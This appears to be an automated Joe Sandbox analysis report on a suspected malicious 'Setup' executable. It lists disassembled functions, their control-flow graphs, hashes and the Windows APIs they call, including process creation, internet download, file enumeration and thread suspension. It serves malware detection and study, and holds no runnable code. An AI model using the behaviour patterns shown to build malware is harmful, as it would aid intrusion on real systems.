                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 112277046-0
                                                                                                                                                                                                                                                      • Opcode ID: b9465449084779e6df47dc848f331113abbb30d73bb4f13ede27f537095680e6
                                                                                                                                                                                                                                                      • Instruction ID: 42e418cb38624f639003820316cace7c143c7e9f87285eaa7c10e3287512bdef
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b9465449084779e6df47dc848f331113abbb30d73bb4f13ede27f537095680e6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 57F19C70D04358DFDB14EFA4C944BDEBBB1BF59304F148188E549AB281DB716A89CFA2
                                                                                                                                                                                                                                                      Function 03179C20 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 335processCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 1078 3179c20-3179d57 call 31893a0 call 318d1e0 call 3185820 1085 3179d5b-3179e98 call 3185820 * 3 1078->1085 1086 3179d59 1078->1086 1093 3179e9c-317a01b call 3185820 call 3189b30 call 3187f30 * 7 1085->1093 1094 3179e9a 1085->1094 1086->1085 1113 317a021-317a025 1093->1113 1114 317a249-317a24f call 31768f0 1093->1114 1094->1093 1115 317a027 1113->1115 1116 317a029-317a05e 1113->1116 1115->1116 1118 317a0b0-317a1e4 call 31bfdb0 call 3185820 call 3189be0 call 3187f30 * 2 CreateProcessW 1116->1118 1119 317a060-317a069 1116->1119 1136 317a1e6-317a1f8 CloseHandle * 2 1118->1136 1137 317a1fe-317a246 call 3187f30 * 2 call 31a742b 1118->1137 1121 317a072-317a079 1119->1121 1122 317a06b-317a070 1119->1122 1124 317a07c-317a0aa call 31905d0 1121->1124 1122->1124 1124->1118 1136->1137
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,00000002), ref: 0317A1DA
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0317A1EC
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0317A1F8
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CloseHandle$CreateProcess
                                                                                                                                                                                                                                                      • String ID: ?$D
                                                                                                                                                                                                                                                      • API String ID: 2922976086-1345265552
                                                                                                                                                                                                                                                      • Opcode ID: 8c8a5dd1bf6b3fd77cbe482dd46abfbfc391d863d3b651bc1e71b886b2992b1b
                                                                                                                                                                                                                                                      • Instruction ID: 2d53b3eab4161fc879a37fb4e366adb4b36e31fe3d1a48f22aca359518803ee6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c8a5dd1bf6b3fd77cbe482dd46abfbfc391d863d3b651bc1e71b886b2992b1b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8023871C107A8CADB24DF64C944BD9BBB0BF5A304F1082DAD4596B291EBB45AC8CF91
                                                                                                                                                                                                                                                      Function 0317A250 Relevance: 7.6, APIs: 5, Instructions: 141memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 1144 317a250-317a27a 1146 317a280-317a298 1144->1146 1147 317a3ca-317a3db call 31a742b 1144->1147 1151 317a3c2-317a3c9 1146->1151 1152 317a29e-317a2bc 1146->1152 1151->1147 1155 317a2c2-317a2c8 1152->1155 1156 317a3bb 1152->1156 1157 317a2cf-317a2d1 1155->1157 1156->1151 1158 317a2d7-317a2e3 1157->1158 1159 317a3b2 1157->1159 1158->1159 1161 317a2e9-317a336 GetProcessHeap RtlAllocateHeap 1158->1161 1159->1156 1163 317a3ac-317a3af 1161->1163 1164 317a338-317a347 1161->1164 1163->1159 1166 317a396-317a39e GetLastError 1164->1166 1167 317a349-317a351 1164->1167 1166->1163 1168 317a3a0-317a3a6 HeapFree 1166->1168 1169 317a375-317a389 1167->1169 1170 317a353-317a36e RtlReAllocateHeap 1167->1170 1168->1163 1169->1166 1173 317a38b-317a392 1169->1173 1170->1163 1171 317a370-317a372 1170->1171 1171->1169 1173->1164 1174 317a394 1173->1174 1174->1163
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0317A2E9
                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 0317A32C
                                                                                                                                                                                                                                                      • RtlReAllocateHeap.NTDLL(?,00000008,00000000,?), ref: 0317A366
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0317A396
                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(?,00000000,00000000), ref: 0317A3A6
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Heap$Allocate$ErrorFreeLastProcess
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1125902347-0
                                                                                                                                                                                                                                                      • Opcode ID: 21f28a49876b79ab4b625e8370a3422149fb31fad4b389054b2cce0cbf284120
                                                                                                                                                                                                                                                      • Instruction ID: 271ce6167e66b6cfed884d4714594d351ec4d970a657797f3697d6c91a854c72
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21f28a49876b79ab4b625e8370a3422149fb31fad4b389054b2cce0cbf284120
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8411F75A00259AFDB25EFE5DC48E9FBBB9FF8D741B184029F901A6244DB319940CBB0
                                                                                                                                                                                                                                                      Function 03182080 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 605fileCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 1175 3182080-3182173 call 31761b0 call 318b460 call 3184b60 call 31889a0 call 318cc80 call 31889a0 1188 3182179-31821fd call 318b460 call 3184b60 call 318fe80 call 318b460 1175->1188 1189 3182300 1175->1189 1209 3182203-3182209 1188->1209 1210 31829f7 call 31768f0 1188->1210 1191 3182306-318232c 1189->1191 1193 31829fc-3182a01 call 31768f0 1191->1193 1194 3182332-3182338 1191->1194 1195 318233a 1194->1195 1196 318233c-31823a7 call 318d590 FindFirstFileA call 3187ff0 1194->1196 1195->1196 1215 31827a9-3182852 call 319b490 call 31bfc10 call 318b460 call 3178bf0 call 3187ff0 call 3185030 call 3178de0 1196->1215 1216 31823ad-31823b7 1196->1216 1212 318220b 1209->1212 1213 318220d-318229b call 318d590 call 318a730 call 3187ff0 * 2 call 318a220 call 3182a20 1209->1213 1210->1193 1212->1213 1267 318229d-31822c3 call 3186050 call 317ba40 1213->1267 1268 31822e5-31822fb call 3187ff0 1213->1268 1277 3182883-3182897 1215->1277 1278 3182854-3182880 call 3175670 call 31c325f call 31bfdb0 1215->1278 1218 31823c0-31823c7 1216->1218 1221 318275b-3182780 FindNextFileA 1218->1221 1222 31823cd-31823d2 1218->1222 1233 318278d-31827a7 1221->1233 1234 3182782-3182788 1221->1234 1225 31823d8-31823dc 1222->1225 1229 31823f8-31823fa 1225->1229 1230 31823de-31823e0 1225->1230 1232 31823fd-31823ff 1229->1232 1236 31823e2-31823e8 1230->1236 1237 31823f4-31823f6 1230->1237 1232->1221 1240 3182405-318240a 1232->1240 1233->1215 1234->1218 1236->1229 1242 31823ea-31823f2 1236->1242 1237->1232 1244 3182410-3182414 1240->1244 1242->1225 1242->1237 1248 3182430-3182432 1244->1248 1249 3182416-3182418 1244->1249 1254 3182435-3182437 1248->1254 1252 318241a-3182420 1249->1252 1253 318242c-318242e 1249->1253 1252->1248 1257 3182422-318242a 1252->1257 1253->1254 1254->1221 1258 318243d-3182451 1254->1258 1257->1244 1257->1253 1258->1210 1261 3182457-318245d 1258->1261 1265 318245f 1261->1265 1266 3182461-31824d0 call 318d590 call 318a2c0 call 3187ff0 1261->1266 1265->1266 1266->1210 1299 31824d6-3182543 call 318d590 call 318a690 call 3187ff0 call 3182a20 1266->1299 1288 31822c8-31822e3 call 3187ff0 * 2 1267->1288 1285 31829d5-31829f4 call 3187ff0 call 31a742b 1268->1285 1281 3182899-31828c0 call 31747a0 call 3173ea0 call 31c460e 1277->1281 1282 31828c3-3182928 call 318b460 call 3179500 call 3187ff0 1277->1282 1278->1277 1281->1282 1319 318292a 1282->1319 1320 31829a2-31829cf call 31c460e 1282->1320 1288->1191 1333 3182549-3182605 call 318b460 call 3184b60 call 31889a0 call 318cc80 call 31889a0 1299->1333 1334 3182740-3182756 call 3187ff0 * 2 1299->1334 1321 3182930-31829a0 Sleep call 318b460 call 3179500 call 3187ff0 1319->1321 1320->1285 1321->1320 1351 318266a-3182723 call 318b460 call 3184b60 call 31889a0 call 318cc80 call 31889a0 1333->1351 1352 3182607-3182622 1333->1352 1334->1221 1370 318273a 1351->1370 1371 3182725-3182735 call 317bf90 1351->1371 1354 3182625-318262a 1352->1354 1354->1354 1356 318262c-3182659 call 318b460 call 3180e00 1354->1356 1364 318265e-3182665 call 3187ff0 1356->1364 1364->1351 1370->1334 1371->1370
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32 ref: 0318237C
                                                                                                                                                                                                                                                        • Part of subcall function 0318B460: Concurrency::cancel_current_task.LIBCPMT ref: 0318B532
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_taskFileFindFirst
                                                                                                                                                                                                                                                      • String ID: !
                                                                                                                                                                                                                                                      • API String ID: 2840147243-2657877971
                                                                                                                                                                                                                                                      • Opcode ID: 4f89184b0e5c51054f114e9a2df9e6717d5e646e9315f048eedfa509ccb40b8a
                                                                                                                                                                                                                                                      • Instruction ID: e230dbc57f825926878b8cc49a9cf444edf0b3d213a867ccfc1d121a9b407b8e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f89184b0e5c51054f114e9a2df9e6717d5e646e9315f048eedfa509ccb40b8a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95428A70D0135C9FDB21EBA4C888BEDBBB1AF19304F2442C9D4196B291EB715B89CF95
                                                                                                                                                                                                                                                      Function 02D20A77 Relevance: 7.6, APIs: 5, Instructions: 100threadprocessCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 1373 2d20a77-2d20abe CreateToolhelp32Snapshot 1376 2d20b94-2d20b97 1373->1376 1377 2d20ac4-2d20ae5 Thread32First 1373->1377 1378 2d20b80-2d20b8f 1377->1378 1379 2d20aeb-2d20af1 1377->1379 1378->1376 1380 2d20af3-2d20af9 1379->1380 1381 2d20b60-2d20b7a Thread32Next 1379->1381 1380->1381 1382 2d20afb-2d20b1a 1380->1382 1381->1378 1381->1379 1382->1381 1384 2d20b1c-2d20b20 1382->1384 1385 2d20b22-2d20b36 Wow64SuspendThread 1384->1385 1386 2d20b38-2d20b47 1384->1386 1387 2d20b4c-2d20b5e CloseHandle 1385->1387 1386->1387 1387->1381
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,02D205BD,?,00000001,?,81EC8B55,000000FF), ref: 02D20AB5
                                                                                                                                                                                                                                                      • Thread32First.KERNEL32(00000000,0000001C), ref: 02D20AE1
                                                                                                                                                                                                                                                      • Wow64SuspendThread.KERNEL32(00000000), ref: 02D20B34
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 02D20B5E
                                                                                                                                                                                                                                                      • Thread32Next.KERNEL32(00000000,0000001C), ref: 02D20B76
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Thread32$CloseCreateFirstHandleNextSnapshotSuspendThreadToolhelp32Wow64
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 915977163-0
                                                                                                                                                                                                                                                      • Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                                                                                                                                      • Instruction ID: b382112ee017d2f9c738f7a75245c9bf9f05890d8f608315dc8e5479807c380b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8410C71A00118AFDB18DF98C490FAEB7F6EF98304F108168E6159B794DB34AE45CB94
                                                                                                                                                                                                                                                      Function 02D20367 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 399threadCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 1388 2d20367-2d204cf call 2d20917 call 2d20f17 call 2d210c7 call 2d20cb7 1397 2d20900-2d20903 1388->1397 1398 2d204d5-2d204dc 1388->1398 1399 2d204e7-2d204eb 1398->1399 1400 2d2050d-2d20588 GetPEB 1399->1400 1401 2d204ed-2d2050b call 2d20e37 1399->1401 1403 2d20593-2d20597 1400->1403 1401->1399 1404 2d20599-2d205ad 1403->1404 1405 2d205af-2d205c1 call 2d20a77 1403->1405 1404->1403 1411 2d205c3-2d205e9 1405->1411 1412 2d205eb-2d2060c CreateThread 1405->1412 1413 2d2060f-2d20613 1411->1413 1412->1413 1415 2d208d4-2d208f7 1413->1415 1416 2d20619-2d2064c call 2d20f77 1413->1416 1415->1397 1416->1415 1420 2d20652-2d206a1 1416->1420 1422 2d206ac-2d206b2 1420->1422 1423 2d206b4-2d206ba 1422->1423 1424 2d206fa-2d206fe 1422->1424 1425 2d206bc-2d206cb 1423->1425 1426 2d206cd-2d206d1 1423->1426 1427 2d20704-2d20711 1424->1427 1428 2d207cc-2d208bf call 2d20a77 call 2d20917 call 2d20f17 1424->1428 1425->1426 1429 2d206d3-2d206e1 1426->1429 1430 2d206f8 1426->1430 1431 2d2071c-2d20722 1427->1431 1454 2d208c1 1428->1454 1455 2d208c4-2d208ce 1428->1455 1429->1430 1432 2d206e3-2d206f5 1429->1432 1430->1422 1435 2d20752-2d20755 1431->1435 1436 2d20724-2d20732 1431->1436 1432->1430 1437 2d20758-2d2075f 1435->1437 1439 2d20750 1436->1439 1440 2d20734-2d20743 1436->1440 1437->1428 1442 2d20761-2d2076a 1437->1442 1439->1431 1440->1439 1444 2d20745-2d2074e 1440->1444 1442->1428 1445 2d2076c-2d2077c 1442->1445 1444->1435 1447 2d20787-2d20793 1445->1447 1449 2d207c4-2d207ca 1447->1449 1450 2d20795-2d207c2 1447->1450 1449->1437 1450->1447 1454->1455 1455->1415
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 02D2060A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                                                                                                      • String ID: WYVK$sR8
                                                                                                                                                                                                                                                      • API String ID: 2422867632-1046787239
                                                                                                                                                                                                                                                      • Opcode ID: 71241f842a267370b4fde931541ea62c91b78cacea02c1d1f1d215ef884c2407
                                                                                                                                                                                                                                                      • Instruction ID: 7962e06138a5a766ec3502f6adeb9fc8d21dce32c3239b6dffe83c35fdb1fa18
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71241f842a267370b4fde931541ea62c91b78cacea02c1d1f1d215ef884c2407
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D012D3B4E00219DFDB14CF98C990BADBBB2FF98309F2481A9D515AB385C734AA45CF54
                                                                                                                                                                                                                                                      Function 03182A20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88filenativeCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 031A71D0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,03205040), ref: 031A7297
                                                                                                                                                                                                                                                      • NtQueryAttributesFile.NTDLL ref: 03182B25
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AttributesByteCharFileMultiQueryWide
                                                                                                                                                                                                                                                      • String ID: @$\??\
                                                                                                                                                                                                                                                      • API String ID: 4261815757-506726239
                                                                                                                                                                                                                                                      • Opcode ID: 4fc5a152a99a8ee2b0a011821e5c8fe08f642e201a3d979423f8d2494a4c96ce
                                                                                                                                                                                                                                                      • Instruction ID: de5852200033c870c479f1744f345f176a52a04f123f8450da19eff287610126
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4fc5a152a99a8ee2b0a011821e5c8fe08f642e201a3d979423f8d2494a4c96ce
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D3148B5D003589BCB10EFA8C804BDEBBB8EF08714F20426AD415AB281EB745A09CF90
                                                                                                                                                                                                                                                      Function 0319DEB0 Relevance: 4.7, APIs: 3, Instructions: 188networkfileCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 1474 319deb0-319e06b call 31e21f0 call 31a71d0 call 318b460 call 31a6fc0 call 318b460 call 31a6fc0 call 318b460 call 31a6fc0 1499 319e06d 1474->1499 1500 319e06f-319e0c3 InternetOpenUrlA 1474->1500 1499->1500 1502 319e142-319e172 call 31a742b 1500->1502 1503 319e0c5-319e0ee InternetReadFile 1500->1503 1506 319e13c 1503->1506 1507 319e0f0-319e0f8 1503->1507 1506->1502 1507->1506 1509 319e0fa-319e13a call 319ef40 InternetReadFile 1507->1509 1509->1506 1509->1507
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 031A71D0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,03205040), ref: 031A7297
                                                                                                                                                                                                                                                        • Part of subcall function 0318B460: Concurrency::cancel_current_task.LIBCPMT ref: 0318B532
                                                                                                                                                                                                                                                      • InternetOpenUrlA.WININET ref: 0319E086
                                                                                                                                                                                                                                                      • InternetReadFile.WININET ref: 0319E0EA
                                                                                                                                                                                                                                                      • InternetReadFile.WININET ref: 0319E136
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Internet$FileRead$ByteCharConcurrency::cancel_current_taskMultiOpenWide
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3525159475-0
                                                                                                                                                                                                                                                      • Opcode ID: e216690f63cb4bc84ca3ed91b4ef9ba2707988959cf2f7569673805c990db7fc
                                                                                                                                                                                                                                                      • Instruction ID: 58de4c4178ed0c49f930bb037471ee111d0a74cf69aec68e18415ee9ef627d7a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e216690f63cb4bc84ca3ed91b4ef9ba2707988959cf2f7569673805c990db7fc
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2816C70E00269AFEB24EF54CD09BD9BBB5EF0C704F104189E945AB291D7B59E85CFA0
                                                                                                                                                                                                                                                      Function 02D20927 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103threadCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 02D209F3
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                                                                                                      • String ID: ,
                                                                                                                                                                                                                                                      • API String ID: 2422867632-3772416878
                                                                                                                                                                                                                                                      • Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                                                                                                                                      • Instruction ID: 38a0583b1027c5e682f72f2b36c25b8264173e7b06fa77d447001c89264f2fe1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1341D474A00209EFDB04CF98C994BAEB7B1FF98319F248198D5156B380C771AE85CF94
                                                                                                                                                                                                                                                      Function 03199590 Relevance: 3.5, APIs: 2, Instructions: 516libraryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 031A71D0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,03205040), ref: 031A7297
                                                                                                                                                                                                                                                        • Part of subcall function 0318B460: Concurrency::cancel_current_task.LIBCPMT ref: 0318B532
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32 ref: 03199786
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ByteCharConcurrency::cancel_current_taskLibraryLoadMultiWide
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1730022097-0
                                                                                                                                                                                                                                                      • Opcode ID: 9494ea516d58064e9de1f4cd85b55f118a5f7f0657e06cbfd4897d3f5785c0d5
                                                                                                                                                                                                                                                      • Instruction ID: c8c77f611a940cb76268c665ebf7bdab02ecfc8ff7a923b7aab4568785ef646e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9494ea516d58064e9de1f4cd85b55f118a5f7f0657e06cbfd4897d3f5785c0d5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E9328C70D01268DFEB14DF64C944BEEBBB1AF59304F1482C9E4096B291DBB46B84CF91
                                                                                                                                                                                                                                                      Function 03182B60 Relevance: 1.9, APIs: 1, Instructions: 389COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0318B460: Concurrency::cancel_current_task.LIBCPMT ref: 0318B532
                                                                                                                                                                                                                                                        • Part of subcall function 031A5070: SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?,03205040), ref: 031A50C2
                                                                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32 ref: 03182E31
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AttributesConcurrency::cancel_current_taskFileFolderPath
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 325715954-0
                                                                                                                                                                                                                                                      • Opcode ID: c6b9dd54015bf18d28cfc7533b392f2419f1e4a01eb90c5e47f639679fff3ea4
                                                                                                                                                                                                                                                      • Instruction ID: a5941aba3f3e49e3d09781f34c785a7c7af9b9f3fc1f176dc6b5b143a15afccf
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c6b9dd54015bf18d28cfc7533b392f2419f1e4a01eb90c5e47f639679fff3ea4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5127A34D04398DBEB15EFA4C914BDDBBB0BF59304F2482C9D4592B292DBB11A89CF91
                                                                                                                                                                                                                                                      Function 0317E830 Relevance: 1.7, Strings: 1, Instructions: 448COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                      • String ID: B
                                                                                                                                                                                                                                                      • API String ID: 3859560861-1255198513
                                                                                                                                                                                                                                                      • Opcode ID: 25e352c6a1a8c47736afc2d4bf9287d18feb2f7c93dbbdbb0dd097a38c13211d
                                                                                                                                                                                                                                                      • Instruction ID: 7e0bf13f7858ab63f8346bde17ea1058e3ed4234863f125f7fcd412c8bc92418
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 25e352c6a1a8c47736afc2d4bf9287d18feb2f7c93dbbdbb0dd097a38c13211d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB125930D1039CDFDB10EBA8C944BDDBBB1AF5A304F1442D9D4496B292EB701A88CF92
                                                                                                                                                                                                                                                      Function 031D4F52 Relevance: 1.7, APIs: 1, Instructions: 156timeCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 031D258E: RtlFreeHeap.NTDLL(00000000,00000000,?,031DA896,?,00000000,?,?,031DAB37,?,00000007,?,?,031DB0EC,?,?), ref: 031D25A4
